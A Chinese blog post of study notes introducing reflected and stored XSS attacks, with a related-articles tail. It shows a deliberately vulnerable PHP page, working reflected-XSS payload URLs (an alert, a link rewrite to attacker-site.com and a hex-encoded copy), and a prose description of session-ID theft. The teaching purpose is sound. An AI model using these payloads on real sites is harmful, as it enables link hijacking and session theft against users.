XSS

最新推荐文章于 2020-10-30 19:48:17 发布
最新推荐文章于 2020-10-30 19:48:17 发布
阅读量352 收藏
点赞数 1
分类专栏: 学习笔记 渗透基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44740377/article/details/95005615
版权

今天接触了很多新知识,一时写不下这篇博客。明天又很忙。在此把之前学的XSS整理下:

 

xss攻击可以分成两种类型:

  1. 非持久型攻击
  2. 持久型攻击

下面我们通过具体例子,了解两种类型xss攻击。

 

1.非持久型xss攻击

顾名思义,非持久型xss攻击是一次性的,仅对当次的页面访问产生影响。非持久型xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。

假设有以下index.php页面:

<?php
 $name = $_GET['name']; 
echo "Welcome $name<br>"; 
echo "<a href="http://www.cnblogs.com/bangerlee/">Click to Download</a>"; 
?>

该页面显示两行信息:

该页面显示两行信息:

  • 从URI获取 'name' 参数,并在页面显示
  • 显示跳转到一条URL的链接

这时,当攻击者给出以下URL链接:

index.php?name=guest<script>alert('attacked')</script>

当用户点击该链接时,将产生以下html代码,带'attacked'的告警提示框弹出:

Welcome guest
<script>alert('attacked')</script>
<br>
<a href='http://www.cnblogs.com/bangerlee/'>Click to Download</a>

除了插入alert代码,攻击者还可以通过以下URL实现修改链接的目的:

index.php?name=
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");link[0].href="http://attacker-site.com/";}
</script>

当用户点击以上攻击者提供的URL时,index.php页面被植入脚本,页面源码如下:

Welcome 
<script>
window.onload = function() {
var link=document.getElementsByTagName("a");link[0].href="http://attacker-site.com/";}
</script>
<br>
<a href='http://www.cnblogs.com/bangerlee/'>Click to Download</a>

用户再点击 "Click to Download" 时,将跳转至攻击者提供的链接。

对于用于攻击的URL,攻击者一般不会直接使用以上可读形式,而是将其转换成ASCII码,以下URL同样用于实现链接地址变更:

index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

2.持久型xss攻击

持久型xss攻击会把攻击者的数据存储在服务器端,攻击行为将伴随着攻击数据一直存在。下面来看一个利用持久型xss攻击获取session id的实例。

session背景知识

我们知道HTTP是一个无状态维持的协议,所有请求/应答都是独立的,其间不保存状态信息。但有些场景下我们需要维护状态信息,例如用户登录完web应用后,再一定时间内,用户再进行登录,应不需要再输入用户名/密码进行鉴权。

这时我们用cookie和session解决状态维护问题,当用户首次登入时,服务器为该用户创建一个 session ID,同时向游览器传送一个 cookie,cookie保存会话连接中用到的数据,session ID作为会话标识,游览器后续的请求均基于该session ID。

攻击者可以提供一个攻击链接,当用户点击该链接时,向攻击者自己的服务器发送一条保存有用户session ID的信息,这样就可以窃取到用户的session ID,得到用户的执行权限。

 

 

 

夜车星繁
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
XXXXXXSS
weixin_34341117的博客
03-28 6900
URL编码表http://www.w3school.com.cn/tags/html_ref_urlencode.html%22 "%23 #%27 '%2f /&amp;#x27; '&amp;nbsp; html 空格&amp;quot; html "javascript中的特殊字符如下:\’ 单引号 " 双引号 \&amp; 和号 \\ 反斜杠 \n 换行符    url中对应%0a\r 回...
个人网站对xss跨站脚本攻击(重点是富文本编辑器情况)和sql注入攻击的防范...
weixin_30614587的博客
12-31 432
昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷……其实攻击者进攻的手法很简单,没啥技术含量。只能感叹自己之前竟然完全没防范。 这是数据库里留下的一些记录。最后那人弄了一个无限循环弹出框的脚本,估计这个脚本之后他再想输入也没法了。 类似这种: <html> <body onload='while(true){alert(1)}'> &...
xss-学习姿势
xyzBlog
08-11 365
xss也叫跨站脚本攻击,原因在于网站的前端因为对输入或者输出不严谨从而可以在网站插入脚本代码造成xss攻击。 <The rest of contents | 余下全文> xss形成分类 主要是分为反射型和存储型还有dom型 反射型 这里的提交参数没有进行过滤转义,导致输出处可直接执行脚本代码 <form action = "htmlzr." method = "get"> name:<input type = "text" name = "htmlname"> &l
XSS简介
Neil.Liu的博客
10-17 367
XSS简介 0x10 跨站脚本 (Cross-site scripting, 简称XSS) 是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 **XSS攻击 **通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方式注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。...
XSS脚本详情
Kangjie_oo的博客
10-30 358
XSS脚本攻击 定义 XSS全称(Cross Site Scripting)跨站脚本攻击,XSS属于客户端攻击,受害者最终是用户(网站管理员也属于用户),常用语言为JavaScript(也有其他语言) 原理 程序对输入输出控制不够严格,进而脚本输入后,在输出到前端被浏览器当作正常代码解析从而产生危害,输入输出条件必须同时满足 万能代码框架 '"> XSS分类 反射型XSS 交互的数据一般不会被存在在数据库里面,只是简单的把用户输入的数据反射给浏览器,一次性,所见即所得。(中危) 储存型XSS
米斯特 xss
05-03
米斯特的xss进阶教程~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~·~~
springboot整合XSS
03-20
springboot 整合预防xss攻击
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通关小游戏,以闯关的形式检验xss掌握程度。
XSS攻击常识及实战
mathor的博客
10-31 1万+
什么是XSSXSS全称是Cross Site Scripting(为了和CSS进行区分,就叫XSS)即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了 XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS 反射型XSS 发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响...
题目 1426: [蓝桥杯][历届试题]九宫重排
韩绘锦的博客
10-10 225
题目 1426: [蓝桥杯][历届试题]九宫重排 时间限制: 1Sec 内存限制: 128MB 提交: 2574 解决: 767 题目描述 如下面第一个图的九宫格中,放着 1~8 的数字卡片,还有一个格子空着。与空格子相邻的格子中的卡片可以移动到空格中。经过若干次移动,可以形成第二个图所示的局面。 我们把第一个图的局面记为:12345678. 把第二个图的局面记为:123.46758 显然是按从上到下,从左到右的顺序记录数字,空格记为句点。 本题目的任务是已知九宫的初态和终态,求最少经过多少步的移动可
常见的Web漏洞——XSS
热门推荐
江左盟的博客
07-08 2万+
目录 XSS简介 XSS原理及分类 反射型XSS 存储型XSS 基于DOM的XSS XSSer的使用 至少有一个的参数: 可选的参数: 检查选项 选择攻击向量 绕过防火墙选项 绕过器选项 特殊技术 最后注入选项 特殊最后注入选项 报告导出 XSSer演示 BeEF-XSS 漏洞的防范 总结 XSS简介 XSS是跨站脚本攻击(Cross Site Scri...
kali linux下nmap的使用
夜车星繁的博客
05-26 1万+
nmap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包。  其基本功能有四个: 主机发现(Host Discovery) 端口扫描(Port Scanning) 版本侦测(Version Detection) 操作系统侦测(Operating System Detection) 主机扫描: 1)-sL 列表扫描:可以对主机进行反向域名解析,校验i...
burpsuite检测xss漏洞
夜车星繁的博客
07-17 7499
burpsuite检测xss漏洞 XSS(跨站脚本攻击)漏洞是Web应用程序中最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等。根据其触发方式的不同,通常分为反射型XSS、存储型XSS和DOM-base型XSS。漏洞“注...
wireshark
夜车星繁的博客
06-19 5648
晚上看渗透教程看的很懵。。。 在此水一篇教程,接下来会努力学习写出好的博客。 Wireshark界面说明 过滤器表达式书写是wireshark使用的核心,但在此之前,很多初学者还会碰到一个难题,就是感觉wireshark界面上很多东西不懂怎么看。其实还是挺明了的我们下面简单说一下,如下图。 1号窗口展示的是wireshark捕获到的所有数据包的列表。注意最后一列Info列是wires...
FTP服务器漏洞靶场
夜车星繁的博客
06-24 2761
之前做过一道靶场;FTP服务器漏洞 需要用到一些DOS命令与FTP下一些重要的命令,在此整理下姑且作一篇博客, 查看题目: 查看靶机IP后,PING了一下: 随便输入一个用户名: 看来需要爆破用户名和密码。 可是我太菜了不太会,上网搜了下关于FTP服务器的一些知识,知道它也许存在匿名登陆; 于是试了试; 登陆成功界面: 登陆成功后,下载下其中有用文件并查看: ...
CTF中常见文件的文件头(十六进制下)
夜车星繁的博客
06-09 2443
近日刷题ctf杂项部分,整理一些粗略的必备知识点以将来复习。 jpg/jpeg FF D8 FF E0 或 FF D8 FF E1 或 FF D8 FF E8 png 89 50 4E 47 bmp 42 4D 36 5D gif 47 49...
bugku 网站被黑/管理员系统/WEB4/输入密码查看flag 题目详解
夜车星繁的博客
05-22 1997
网站被黑 来到了bugku;打开“网站被黑”这道题; 页面如图; 接触此类题目,一般从后台扫描方面考虑; 御剑后台扫描工具 链接: https://pan.baidu.com/s/1bebPE9aNEVnV1_o1fgAMvA 提取码: w46z 扫描http://123.206.87.240:8002/webshell/结果如下,发现后台一个网站: 打开这个网...
xss filter
最新发布
09-08
XSS (Cross-Site Scripting) 是一种常见的安全漏洞,攻击通过注入恶意脚本来攻击网站用户。为了防止XSS攻击,可以使用XSS过滤器来对用户输入的数据进行处理和过滤。 XSS过滤器的主要目标是检测和阻止恶意脚本的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值